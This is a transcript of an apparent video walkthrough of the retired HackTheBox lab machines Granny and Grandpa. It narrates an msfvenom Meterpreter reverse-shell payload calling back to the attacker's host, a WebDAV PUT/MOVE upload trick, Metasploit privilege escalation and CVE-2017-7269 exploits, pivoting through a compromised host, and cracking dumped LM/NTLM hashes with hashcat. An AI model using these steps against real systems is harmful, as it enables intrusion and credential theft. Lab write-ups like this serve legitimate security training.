Hey guys, what's going on? This is Ipsec, and we're going to be doing two boxes today, both Granny and Grandpa. I didn't do Granny back when it got retired because its exploit path is so similar to Grandpa, you can exploit it literally with the same commands. So instead of doing a box on Granny and potentially spoiling it, I decided to wait until Grandpa got retired, and we're going to do something special and pivot. You don't have to pivot, but we're going to use IP tables to block access to Grandpa and force us to pivot through Granny to get to Grandpa just as a learning exercise. So let's jump in and see what we find with Granny. But before we do anything, let's block access to Grandpa. Grandpa's IP is 10.10.10.14 and Granny's IP is 10.10.10.15. So we're going to do IP tables -L to list all the rules. Then we're going to do IP tables -A to append to the output rule because we're going to block traffic going out of our box. Going to do -D and specify the destination IP, which is 10.10.10.14. And then -J, which is going to jump to what chain we want it to. And we're going to say, hey, just drop this packet. Before I hit enter, I'm going to ping the IP address so you can see it's actually able to get there. And then as soon as we hit enter, we can no longer get to Grandpa's IP. Now that that's out of the way, let's just Nmap. So Nmap-SC for save script, SV, enumerate version, output all formats, and let's call it Granny this time around, just in case we do another Nmap down the road, and then the IP address of Granny, which is 10.10.10.15. I have already ran this, so let's just look at the results. If we look at granny.nmap, we see only port 80 is open. And it has a WebDav server, IIS 6.0, and we know this is 2003 because if we just Google for IIS versions, it should tell us right off the bat 6.0 is for Windows Server 2003. So we know this is a really old operating system off the bat, and it's running WebDav scans, so WebDav is enabled. The first thing I'm going to do there is, well, before we do anything, let's set up our enumeration script so we have things going in the background while we do this. I'm going to go to opt dirbuster, or not dirbuster, gobuster, and this is just a dirbuster program that's command line and works well. If you want to know how to install this, I'd recommend going to the haircut video. So gobuster-h to see the flags. We're going to do -W for path to the word list, so user share word list, dirbuster, and then directory list 2.3-medium -u for, and then URL, so http 10.10.10.15, and -t for threads, and we're going to do 20. So name this to GoBuster. The other thing we may want to do is just run a nicto scan. So nicto dash, is it URL, I think? It'll complain if it's not. 10.10.10.15. I don't run nicto that much, as you can tell. Dash config. I could have swore I could have just outputted that. Nicto dash capital H to view the full help. Grep dash I on URL. Less. I could have swore it was just nicto http 10.10.10.15. Is it dash host? That's stupid. So we got nicto running. Eventually. Thing I wanted to do is just do a DavTest. And we can look at the options, -URL, and then http 10.10.10.15. And this is going to do some basic WebDav type enumeration, and we see it did a bunch of puts and succeeded. and try to execute like PL, JSP, CFM, which is Cold Fusion, HTML, text, JHTML, PHP. It only succeeded on HTML and text, so let's see what this actually says. HTML put via DavTest. So let's see exactly what DavTest is doing. We go into our burp. Let's create a proxy listener, bind our port 80, and we're going to redirect it to host 10.10.10.15 on port 80. So now, when I go to localhost, intercept is on. We now navigate to the web server we want, because DavTest doesn't have a proxy option. So now I can do DavTest on localhost. And then when we go into burp's history, we can see all the commands DavTest is running. So here's the put syntax. We see it's just a HTTP put. Instead of get here, they put put and the file name and then text. So let's try something. Control R, send that to repeater, and we're just going to put ipsec.html, and we're going to put this is a test. It says created, and if we go to ipsec.html, we get the file creation. So the next thing to do is try to figure out which file extension will be executed. It's saying it's powered by asp.net, so this will be aspx files. So what I'm going to do is do MSFVenom, and we'll do -h and grep for, is it -p, and this will list all the payloads. -l list payloads, and just grep for Windows. And we're going to want to use the Windows Meterpreter reverse TCP, most likely. So, Windows Meterpreter reverse TCP. So that's the payload we want to use. And then we want to list formats, and I think I can just do --list formats and see if this supports aspx. Help formats. So we see the formats are ASP, ASPX, ASPX EXE. We're just going to want to do ASPX. So MSFVenom-P Windows Meterpreter reverse TCP lhost, because we got to do our IP address, which is 10.10.14.4, I think. 10.10.14.4, yes. That screwed up. Then L port is equal to, let's do 44. Well, let's just do, it doesn't matter, 1337. Then we gotta do -f, and we're gonna specify ASPX. And we create this payload. We're going to copy this, go back here, paste it in. So we've uploaded our ASPX payload. Let's just see what's going on. See all the contents of this, so we know the server is not executing it. So it's not executing ASPX through the HTML extension. We have to upload this as a ASPX file. Before we do that, let's just go and create a MSF console session, or a MSF handler. So if we do get code execution, we get a shell right away and know that. Because right now, we're not listening on the port, so we have no idea if we ever get that shell. So use exploit multi-handler, set lhost is equal to ton0, and we'll do that twice because for some reason, sometimes if you don't do it twice, it doesn't specify to that interface. Weird bug. set L port to 1337, set payload to Windows Interpreter reverse TCP. Run that, and we see our listener is listening on 10.10.14.4 on port 1337, which is what we had created with MSF handler. So the next step is to go back into burp and try changing this to aspx to see if we can upload. And we get a forbidden. You do not have permission to execute this program. So, can't upload aspx. If we go back to our Nmap scans, we see allowed methods, options, trace, get, ahead, delete, copy, move, prop find, prop patch, search, call, lock, unlock. And how it's doing this is literally just doing options on the web server. And we probably need to get rid of this and that. Maybe it's just option. Blank line. Options. There we go. And it tells us what options it's doing. But the move option sounds interesting. So let's go to Google real quick and do HTTP move. The move method. Because we want to see how to do this. So it says the request, move the file name, and add a destination in the header to where you want the location to be. So let's do move ipsec.html and destination to be ipsec.aspx. Delete this. Click go. Bad gateway. /ipsec.aspx. Was it trying to register a host name? It was. 204, no content. We'll see if the file exists now. Don't get a 404 error, and if we go to Metasploit, session 1 has been opened. So, we finally have our first session with Granny. The first thing we're going to do is search for suggester and see what exploits are there. Or, before we do that, we can confirm who am I? Shell. And we're NT30 network service. Background that with Control Z. Use exploit suggester and set session to 1. And then run this. And this is just going to gather a bunch of potential local exploits for this box. And it shouldn't take too long, but there's going to be one issue. And I chose to go into shell and do who am I instead of doing get UID to highlight what issue is about to happen. If this ever finishes. So while that's going, this is when we decide to look at GoBuster to see what directories are on the web server. Doesn't look like anything. Just images, private. Go to Nicto, and we can see what Nicto says. We see IIS 6.0. Put allows clients to save files, delete, you can delete files. Allowed methods. Looks like it's created by front page based upon this file. So, various things that Nicto says. But we have the exploit list now. And let's just try MS16016 WebDav. Because, well, we've exploited WebDav, so let's try PrivX through WebDav. So, use this. Show options. set session to 1, set lhost to ton 0, run this, and we see the TCP handler on 192.168. So that's why I do lhost ton 0 twice, and it fixes. And for some reason, it worked right away, I think. I was not expecting that. Let's try verify privileges manually or use get UID and interpreter verify exploitation. The get UID is probably going to fail, but I want to do something before we fix that. So let's use a different exploit. No, it's not. So sessions-i1, get UID. Okay, so the bug I was expecting did not happen. However, we may have not got a shell. So something could be wrong with this server, because I think MS15 should have worked. Let's try this one. Run this again, and we'll see if this exploit works. Exploitation successful, so sessions-i1, get UID, and we're system. So MS14.070 did work. I was expecting MS15 to give us a callback. I'm not exactly sure why it didn't, but we have now elevated to system credentials. It's a Windows 2030 box. It's unpredictable. A lot of things can happen. But being system, now let us try to access Grandpa. If we do shell, we can do a ping on 10.10.10.14. We can get there from this box, but if we try to get there from our box, we can't. So what we're going to do is background this and do a search for socks and set up a socks proxy. So auxiliary server socks 4a, show options. It's going to listen on 000, port 1080. That is fine. And then we're going to, I think it's just route add 10.10, 10.14, 1. Okay. So what I just did there was tell Metasploit on this IP address, send it through session 1. So if we go to our box and edit proxy chains, we can do a SOCKS4 proxy on 127.0.0.1 on port 1080. So now when we do proxy chains nc-v 10.10, we can just curl. Error parameter is incorrect. I wonder if this is because of IP tables. We'll do HTTP. So I was not expecting that. Let's just go into Metasploit again and search for scanner. One of these should be a TCP scanner to do a port scan through Metasploit. I've never actually demoed a pivot this way with IP tables blocking something on the local subnet, so not sure if this is going to work. Probably something I should have tested before I did the video. I'm not sure where this is, so I'm going to do a cheap way to find scripts, and we'll just do locate that and grep-i TCP or scan. Oh, I did or, not and. I even said that out loud as I typed it. Okay. Auxiliary scanner, port scan, TCP. That's what we want. Session 1 closed, so let's re-exploit. Session 2 opened. We'll do... Yeah, that still works. MS14, set session 2, run, lhost, run. Okay, session 3, route add 10.10.10.14, 3. So use auxiliary scanner port scan TCP, show options, set ports to 80, set our host to 10.10.10.14, run, and we see it is open. So why isn't my proxy chains working? Let's just try one last thing. SOX4A, that's running. Netstat ALNP, grep list, 1080. Okay, we have that running. V, etc. Proxy chains, SOX4, curl. That could also just be, oh, there we go. No. 10.10.14 is blocked. Proxy chains. That could just be the error message on Grandpa. So if we do iptables -- flush and curl HTTP 10.10.10.14, yeah, it was working this whole time. So wait, why did I just block 10.10.10.15? That should have been 14. This video is filled with mistakes. Okay. Okay, everything works. So proxy chains is now configured to go through and work. And if we just do this, we should get a 404. No. But I guess that's expected. And if this is all confusing, just follow the instructions I did back to set up proxy chains, and it was all working to begin with. But now we can do a DavTest on HTTP 10.10.10.14, and we see a bunch of messages. DavTest summary did not like proxy chains. I think that one succeeded, but I wish it didn't say all this. But Grandpa's WebDav is not fully open, if that makes sense. As in, we cannot just write to this directory server. So what we're going to do is go to Google real quick because I forgot the CVE, but there was a IIS 2013 WebDav 2017, and that may pull it up. Exploit. So I just remember this one because it's odd seeing a CVE come out in year 2017 against a end-of-life software which is Windows Server 2003. So this is a SC storage path from URL overflow for Windows Server 2003 WebDav servers. So what we're going to do is search Metasploit for 7269, and we get the exploit. Show options, set rhost to 10.10.10.14, set lhost to ton 0, do that twice, and I'm going to set up Wireshark so we can do a packet capture to show we're not actually communicating with 10.10.14, we're going through 15 to get to 14. So let's listen on ton 0. Run. And our source and destination, let's see. It should have just went through. Huh. Route 10.10.10.14, session 3. Maybe it's not used to doing routes this way. Because this should have just went straight to 10.10.10.15. Yeah. It is. Oh. So what happened was, and I'm sure we can find it here, if IP tables didn't block us. Let's do source 10.10.14.4, 10.10.15, 10.10.14. So we had the server call back to us, but we couldn't reach back out to it. So exploit looks like it was successful, but because we couldn't communicate back to it, we didn't get a shell. So what we have to do is just set lhost to 10.10.10.15. And this is the IP address of Grandma. And Metasploits can be smart enough to do all the port magic and port forwarding magic to forward this session back to our console. So if we run this now, or exploit, handler failed to bind, route, let's do set L port to 50.30.2.1. Failed to bind, 10.10.10.15, route, session 3, get UID, and we are system. So I'm not exactly sure why that's not working. But generally, that is how you would do it. Maybe there's a firewall on this box that is preventing us, and I guess I should have looked up all the commands to disable the firewall, but this is Windows Server 2003, and I don't know those off the top of my head, so I guess we're just going to drop IP tables and not pivot. That is how you would pivot, but that's not working. So I tried. Set lhost ton 0. Do that twice, and run. Exploit complete, but no session was created. Show options. Route del 10.10.10.14. Route removed. Let's try running this again. Let's just completely exit from Metasploit and start over. Because this exploit definitely should work. Set our host to 10.10.10.14. Ports, that's fine. lhost to ton0. Do that twice. Run. If this doesn't work, we're going to have to revert the box. Nope. There we go. And it's dead. Try again. This box definitely seems to be in a odd state. So, session 2 is opened. There we go. If we get UID, and we get NT Authority System. If you ever do get UID, and that doesn't return NT Authority System, chances are you have a bad token, so run PS and migrate to a process that you think you can access. So maybe this SV host. So you just do migrate 668. So, background this, let's do suggester, or it was what, MS14? Let's just try this exploit again. Show options, set session to 2. Set lhost, ton0, do that twice, run. And we'll see if we get... There we go. Session's already elevated, so we were already root, apparently. Session I2, get UID, and system. So, was I system then? Yeah, I was. So, this exploit just gave me system on the box to begin with. I thought that said network service, but we were system. So, the last thing we can show off is using portfwd to access a service. So, if we nmapped grandpa, we would see only port 80 is open. So if we do SMB client, which is trying to use port 445 to 10.10.10.14, try to mount the cvol share, which is just the root of the C drive, specify the user as administrator. This doesn't matter because I can't type. And the port is open. Support open on 10.10.10.14. Is it open? SMB client may just ask for the password before trying to connect. So 10.10.10.14 on port 445. And it doesn't look like the port's open. So let's do -n for don't resolve DNS and port 445. So the port is closed on 10.10.10.14. SMB client just always asks for the password. So what we want to do is do portfwd. We do -h. We can say, okay, the port to listen on is going to be 445. The port to connect to is 445. And the remote host is going to be 127.0.0.1. I think that syntax is correct. We have to add. So what I'm doing is a local TCP relay was created. So if I go into my bash, do netstat_alnp grep 445, Metasploit is listening on port 445. And what it's doing is forwarding that to the session on localhost 445. So we can now bypass the firewall by -p445-n. We'll do safe scripts. This shouldn't take too long. On localhost. And it's going script scan. Almost done. But that's allowing me to use my interpreter session to access the grandpa machine on a port that is not listening externally. Come on, script, finish. So while that goes, eventually we'll need a password. So I'm just going to do the hash dump. And this is Windows 2003, and it uses landman hashes. So this is the LM hash, this is NTLM. LM is god awful. So what they did, well, they as in Microsoft, to create these hashes, I think they divided the password up into two 7 characters pieces and uppercased them both. So this is actually 2 hashes. If we divide this in half, this will be the first half of the password. This will be potentially the second half. If it's not 14 characters, it may be 16. I may get the numbers off. They just pad it with, I think, zeros or blank characters or something. But that's why you see this AAD3B, because this password, there's no password set here. And we see this string, AAD3B, repeats about halfway through the hash, because again, this one hash is 2 hashes. So what they did was mean you only have to crack the password twice, and it's going to be up to 7 characters. It's really fast to crack LM hash. So we're just going to do LM hash crack. And input the hash here. 2 new hashes, not in database, so it wasn't there. Let's go back to one that may crack faster. Crack station. Not found. Please wait a bit. It's actually funny because I guess this password is randomly generated. This is a different one than I have in my notes. So I guess we can try Lacus. Is this user in any database? No. But that password is going to be a random password. And then we use NTLM to get the casing. And that'll make sense if I ever decrypt this. So that's Lacus. This will be administrator. YH. Not found. So what I'm going to do is we will wait a bit, and it should crack in one of these sites soon. So yeah, I guess while the sites try to crack it, we can just crack it. I normally don't crack LM hashes because I don't have the rainbow tables, but it's a super quick hash to crack. You probably don't need rainbow tables, so this will be a learning exercise for me as well as you. So let's go back to Metasploit, get our hash. We'll do administrator SSH v. Let's call this jipa.lm hash, and then we'll do Hashcat. Move this into Hashcat. Hashcat -h grep lm. So it's going to be mode 3000. Brute force is attack method 3. So we'll do /hashcat -m. What I say? 300. 3000. 3000-a3 jipa.lm hash, and we said it's 7 characters. So that's 1, 2, 3, 1, 2, 3, 4, 5, 6, 7. So we're going to crack LM hash up to 7 uppercase characters. Let's see how quick this goes. And we see, whoa, that was fast. So already cracked the entire space of 7 characters. We got 1 out of 2. And you see, it separated LM hash into 2 different hashes. So the reason why it didn't get both of them is because the other one's not 7 characters, which is good for us. If the password's longer than 14 characters in LM's hash, it just drops all the additional characters. So if it was a 16 character hash, we wouldn't be able to recover the full password out of LM hashes. So now I'm just doing 6 characters and recovered 1 out of 2. We're going to do 4 characters. This is 5. And we just got the second half. That is how fast it is to crack LM hashes and why it should always be disabled. So if we do --show, do we have to actually specify mode 3000? Yeah, so we get both halves of the password. So we got that, and we got this. So I believe the hash code was C7. It would make sense because that's the longer one. Yes. Session 2 died, so we have to get this session. Let's see. Do I have... lhost? That's the one I want. Run this. No session created. Try again. I don't know why this is so flaky. Come on. Is my VPN connection up? Yeah. So what I'm going to do is revert the box. So pausing the video. So the box has been reverted. Let's try again. And we get session 3 right away, almost instantly. So sometimes the box just needs to be kicked. Lesson learned. So if you're doing these boxes, ever think you're doing something correctly and it's just not working, try reverting the box. Come on, give me my session. Get UID. This is what I was expecting to happen when I run get UID. So if we go and do the exploit suggester, this is session 3. And I know all you want to do is be like, I just want to see the cracking stuff. So while that runs, we can vgpa.ntlm hash, and we'll want to copy both of this. Copy that. Copy this. I'm also going to type it, IHRNWUIENDKE. And having it in all uppercase and all lowercase, I find works better when you do the brute forcing, because Hashcat's only going to do a toggle 5 and toggle the casing on 5 of the characters. So that's when you just manipulate the dictionary, and that's the easiest way. So let's Hashcat. I think it's going to be 1000 for NTLM, but let's just grep real quick. 1000. Dem 1000. GPA.NTLM hash. That's the hash, the dictionary. Oh no. mvgpa.ntlm hash. That is definitely not the hash. That is a password. So gpa.dict. And we'll have to get the password. So let's escalate back to root. And I'm going to laugh if this changed the password on us because I just reverted the box. I just thought of that. Use. Test this one out. Exploit. And we get Oh. No, it's 3. And we get this weird error. This isn't the exploit failing to attack the box. This is just we don't have enough privilege. And we can see, even if we do the correct IP. So let's do a sessions-i3 ps. And we are probably, I'm guessing, in this process. So we're going to migrate to 1800. DavC data. Migrate 1800. 1848. So yeah, we were definitely in this process. Migrate successful. If I did go get UID, I now have the tokens. So running this exploit, I no longer get that error, and this works. And we get session 4 has opened. Session 4 has opened, so hash dump. We do indeed have a different hash that is infuriating. So you're going to see Hashcat again. We're going to do gpud.lm hash. Paste that. Attack mode 3000. 1, 2, 3, 4, 5, 6, 7. Recovered 1. Get rid of 2. So now we're cracking for 5 characters. Crack for 4. Crack for 6. And we got it. So now we can do a --show to show the password. And it's going to be this. So gpud.dict. Let's type that in lowercase. Okay. Type that right. So now, /hashcat what was NTLM? /1000. gpud.dict. We need a hash. NTLM. Ruby. Grab the NTLM hash. /1000. gpud.ntlm. gpud.dict. -r. And we'll do rules toggles 5. And this toggles up to 5 case switches. And we should be able to get the password now. Because again, LM hash uppercases everything. And NTLM is not. So we recovered 1 password. And there is the password for administrator. So let's go back and do a port forward rule. And if you're curious how I type so quick, that's Control-R. And you begin typing the command and it autofills. That's for Bash and pretty much everything in Linux. And I think PowerShell too. So we created that relay. So when we do SMB client on localhost, it's going to forward it to Grandpa. And I'm going to type the password, and we get in. So, hope you enjoyed that. Let me, trying to think. Yeah, we'll go try and pivot one more time. So, let's see if we get this IP tables thing working. So, IP tables -L. We'll block access to Granny. So, drop 10, 10, 10, 15. Granny has been blocked. So let's go back into Ruby, which is Metasploit, background Metasploit, route add 10, 10, 10, 15 on session 4. Okay. So we're going to do the, let's just search for WebDav. And there is one upload one. This exploit is going to do what we did manually and use the put into move. So use that exploit. Show options. Set rhost 10, 10, 10, 15. Set lhost 10, 10, 10, 14. And let's see if this works. Yeah. It worked just fine. For some reason, it did not exploit. Resource not found. Let's try running that again. I wonder if grammar needs to be reverted to. It's uploading, executing. Deletion failed. I wonder if my computer is aware of that and my IP tables is somehow blocking me. Because again, never did pivots this way. Wait, why does it say my handler there? Yeah, that was the weird bug where you set lhost. Because I noticed it was setting it on ton 0 still instead of grandpa, which is 10, 10, 10, 14. And it fails. So let's go back and do sessions I4, port forward, -H, and try to manually do this. So port forward -L will do 1337. And the port to connect to will be 1337. And the host will be 10, 10, 14, 4. First. Thought that was correct. Oh, -P, remote host. Is it 15? I forget the syntax to do this. So let's see. -L, the local host to listen on. I hate how they have different options, so maybe it's to Google. Port forward local. Let's see. -L. They give syntax options. Match case on. Go down. They do not. Wait, I wasn't doing add. Oh my god. So. You must specify a local port, remote host, and remote port. So, I think I had it right the very first time I did this. So we got the remote host. We got the remote port. And we got the local port. And we just crashed Interpreter. Awesome. So, I guess we'll have to do a different video on pivoting when it's not on the same subnet and a bit easier to do. So, hope you enjoyed the video. Take care, guys. Until next time.